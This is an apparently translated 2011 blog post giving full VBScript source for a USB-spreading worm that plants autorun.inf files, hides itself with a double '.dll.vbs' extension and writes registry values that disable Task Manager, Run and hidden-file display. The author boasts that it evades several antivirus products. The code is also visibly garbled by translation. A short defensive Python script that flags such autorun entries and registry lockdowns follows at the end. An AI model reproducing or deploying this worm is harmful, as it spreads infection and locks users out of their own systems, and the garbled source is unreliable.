Friday, 19 August 2011

Creating a Simple Virus - Notepad


While poking around on my brother's flash disk, I suddenly found a local piece of malcode written in the VBS language. Well, it turns out virus makers have started to look at VBS. Maybe this is related to IPR (Intellectual Property Rights), since so many of the VB6.0 copies in circulation are pirated. So they write viruses in VBS, which can be made with nothing more than Windows Notepad, because the compiler for it, the Windows Based Script Host, is already integrated into Windows.
As promised, we'll create a simple virus using Notepad. This virus spreads itself to removable disks with autorun, so that a flash disk from an infected computer runs it as soon as it is plugged into the victim's machine, without waiting for the user to launch the infector. I named this virus "Kalong.VBS". Now open Notepad. Copy the following code:
'/ /-The beginning of the code, set so that when the error is left and then continue the activities of virus-/ / on error resume next
'/ /-Dim following words-/ / dim rekur, windowpath, flashdrive, fs, mf, content, tf, fruit bats, nt, check, sd
'/ /-Set of a text that will be made for the Autorun Setup Information-/ / contents = "[autorun]" & vbCrLf & "ShellExecute = wscript.exe k4l0n6.dll.vbs" set fs = CreateObject ("Scripting.FileSystemObject" ) set mf = fs.getfile (Wscript.ScriptFullname) dim text, size = size = mf.size check mf.drive.drivetype mf.openastextstream set text = (1, -2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbCrLf loops do
'/ /-Copy itself to become the master file in the Windows Path (example: C: \ Windows) Set windowpath = fs.getspecialfolder (0) set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (windowpath & "\ batch-k4l0n6.dll.vbs", 2, true) tf.write tf.close recursive set tf = fs.getfile (windowpath & "\ batch-k4l0n6 . dll.vbs ") tf.attributes = 39 '/ /-Make Atorun.inf to run the virus automatically each flash disc plugged-/ /' It spreads to every drive that bertype 1 and 2 (removable) including diskettes
for each flashdrive in fs.drives' / /-Check the Drive-/ / If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'/ /-Make infector if it turns out Drivetypr 1 or 2. Or A: \ - / / set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ k4l0n6.dll.vbs ', 2, true) tf.write tf.close recursive set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 39
'/ /-Make the text of his Atorun.inf had been prepared (Auto Setup Information) - / / set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 32 set tf = fs . createtextfile (flashdrive.path & "\ autorun.inf", 2, true) tf.write content tf.close set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 39 end if next
'/ /-Manipulation Registry-/ /
set bat = CreateObject ("WScript.Shell")
'/ /-Manip - Change Internet Explorer Title to be THE Bats vs. Zay-/ / kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", "THE Bats vs. Zay"
'/ /-Manip - Set so that hidden files are not displayed in Explorer-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Advanced \ Hidden", "0", "REG_DWORD"
'/ /-Manip - Eliminate the Find menu, Folder Options, Run, and block the Regedit and Task Manager-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFind", "1", " REG_DWORD "kalong.RegWrite" HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFolderOptions "," 1 "," REG_DWORD "kalong.RegWrite" HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoRun " , "1", "REG_DWORD" kalong.RegWrite "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableTaskMgr", "1", "REG_DWORD"
'/ /-Manip - Disable right-click / / kalong.RegWrite "1", "REG_DWORD"
'/ /-Manip - Come up with messages every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ LegalNoticeCaption", "Worm Bats. Variant from Rangga-Zay, do not panic all data are safe. "
'/ /-Manip - On every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Systemdir", windowpath & "\ batch-k4l0n6.dll.vbs"
'/ /-Manip - RegisteredOwner and Organization Change-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOrganization", "The Batrix" kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOwner "," Bats "
'/ /-Now if the code below I do not know, please Mas Aat_S to explain / / if check <> 1 then WScript.Sleep 200 000 end if loop while check <> 1 set sd = CreateObject ("WScript.Shell") sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname 'End of Code

Save the code in Notepad with FILE > SAVE. Then under "Save as type" choose "All Files (*.*)". Save it with the name: k4l0n6.dll.vbs. The *.dll part is not actually needed; it is only there so the file looks less suspicious.
He .. he ... This virus/worm is not purely my own idea, because it imitates the code of the Rangga-Zay virus. But this one is better because it is not detected by PCMAV RC15, ClamAV, and AVAST. Consider it a way of showing you that making a virus/worm does not require buying pirated software. Notepad (from an original Windows) is enough.
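The two traces this script leaves are an `autorun.inf` that hands a script to `wscript.exe` and a set of Explorer/System policy values set to 1, and both can be triaged offline. The following is an added example, not code from the original post: the function names, the sample `autorun.inf` text and the sample registry export are constructed for illustration.

```python
# Added triage example: flag autorun.inf launch entries and HKCU policy
# lockdown values of the kind described in the post. Sample data is constructed.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")
LAUNCH_KEYS = ("open", "shellexecute")
# Policy value names the post's script sets to 1.
LOCKDOWN_VALUES = {"NoFind", "NoFolderOptions", "NoRun", "DisableTaskMgr"}

def autorun_findings(text):
    """Return (key, command, reason) for risky launch entries in autorun.inf text."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, cmd = (p.strip() for p in line.split("=", 1))
        k = key.lower()
        is_verb = k.startswith("shell\\") and k.endswith("\\command")
        if k not in LAUNCH_KEYS and not is_verb:
            continue                      # icon=, label=, etc. do not launch anything
        tokens = [t.strip('"').lower() for t in cmd.split()]
        if any(t.rsplit("\\", 1)[-1] in SCRIPT_HOSTS for t in tokens):
            findings.append((key, cmd, "launches a Windows Script Host binary"))
        elif any(t.endswith(SCRIPT_EXTS) for t in tokens):
            findings.append((key, cmd, "launches a script file"))
    return findings

def lockdown_findings(reg_values):
    """reg_values maps a full value path to its data; flag lockdown values set to 1."""
    return sorted(path for path, data in reg_values.items()
                  if path.rsplit("\\", 1)[-1] in LOCKDOWN_VALUES
                  and str(data).strip() == "1")

# Constructed samples (not taken from a real infection).
SAMPLE_INF = "[AutoRun]\r\nShellExecute = wscript.exe sample.dll.vbs\r\nicon = setup.ico\r\n"
POLICIES = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies"
SAMPLE_REG = {
    POLICIES + r"\Explorer\NoRun": 1,
    POLICIES + r"\System\DisableTaskMgr": "1",
    POLICIES + r"\Explorer\NoDriveTypeAutoRun": 255,  # hardening value, not flagged
}

if __name__ == "__main__":
    print(autorun_findings(SAMPLE_INF))
    print(lockdown_findings(SAMPLE_REG))
```

A hit from `autorun_findings` on a removable drive is worth a closer look even when the referenced file is hidden or carries a harmless-looking double extension such as `.dll.vbs`.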